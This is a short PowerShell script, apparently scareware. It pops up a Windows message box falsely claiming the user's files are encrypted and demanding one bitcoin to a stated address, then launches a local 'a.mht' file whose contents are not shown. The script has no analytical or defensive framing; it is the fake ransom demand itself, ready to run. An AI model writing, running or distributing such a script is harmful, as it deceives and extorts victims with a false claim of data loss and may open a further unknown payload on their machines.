[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
$oReturn=[System.Windows.Forms.Messagebox]::Show("ALL YOUR FILES ARE BELONG TO US HAVE BEEN ENCRYPTED ENCRYPTED ENCRYPTED ENCRYPTED ENCRYPTED ENCRYPTED ENCRYPTED ENCRYPTED ENCRYPTED ENCRYPTED ENCRYPTED ENCRYPTED ENCRYPTED ENCRYPTED ENCRYPTED ENCRYPTED ENCRYPTED ENCRYPTED ENCRYPTED ENCRYPTED ENCRYPTED ENCRYPTED!!!!! PAY 1 BITCOIN TO 1PC9AZC4HNX2RMMRT7UHTFYAS3HRBPH4UN!!!!!!")
[System.Diagnostics.Process]::Start("a.mht")
